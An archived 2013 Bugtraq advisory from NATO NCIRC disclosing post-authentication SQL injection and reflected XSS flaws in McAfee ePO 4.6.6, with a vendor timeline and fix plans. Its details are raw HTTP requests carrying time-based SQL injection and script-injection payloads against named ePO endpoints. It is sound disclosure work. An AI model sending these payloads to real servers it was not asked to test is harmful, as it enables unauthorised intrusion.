| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 12 Jul 2013 14:31:54 +0200 From: "NCIRC INFOSEC EVAL" <infoseceval@...rc.nato.int> To: <bugtraq@...urityfocus.com> Subject: Multiple vulnerabilities in McAfee ePO 4.6.6 Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC Multiple vulnerabilities in McAfee ePO 4.6.6 Affected Product: McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions Timeline: 08 June 2013 - Vulnerability found 12 June 2013 - Vendor informed 12 June 2013 - Vendor replied/confirmed & opened service ticket 12 July 2013 - Vendor responded with dates for solutions Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int) CVE: To be assigned NCIRC ID: NCIRC-2013127-01 Description: Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL injection were identified in the latest version of McAfee ePO (4.6.6). All identified vulnerabilities were discovered post authentication. Vulnerability Details: 1. SQL injection a. GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid= 6waitf or%20delay'0%3a0%3a20'-- &index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax Mode=standard HTTP/1.1 b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer &uid=1;%20WAITFOR%20DELAY%20'0:0:0';-- &datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.query Factory %3Aquery.2&index=0 HTTP/1.1 McAfee Solution: Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013. Item "b" has been addressed per Security Bulletin SB10043. (https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043) 2. Reflected XSS a. POST /core/loadDisplayType.do HTTP/1.1=20 displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&ins tanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCp y3ldihsCW&ajaxMode=standard b. POST /console/createDashboardContainer.do HTTP/1.1 displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&ins tanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCp y3ldihsCW&ajaxMode=standard c. POST /console/createDashboardContainer.do HTTP/1.1 elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30 & width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN& filteringEnabled=3Dfalse&mo nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</s cript>&orion.user.sec urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981 )</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1 e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion .user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1 f. GET /ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&or ion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'>< script>alert(30629)</script> HTTP/1.1 g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&o rion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1 h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script >&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=> "'><script>alert(30565)</script> HTTP/1.1 McAfee Solution: Each of these items will be addressed in ePO 4.6.7 due out in late Q3 2013.
Powered by blists - more mailing lists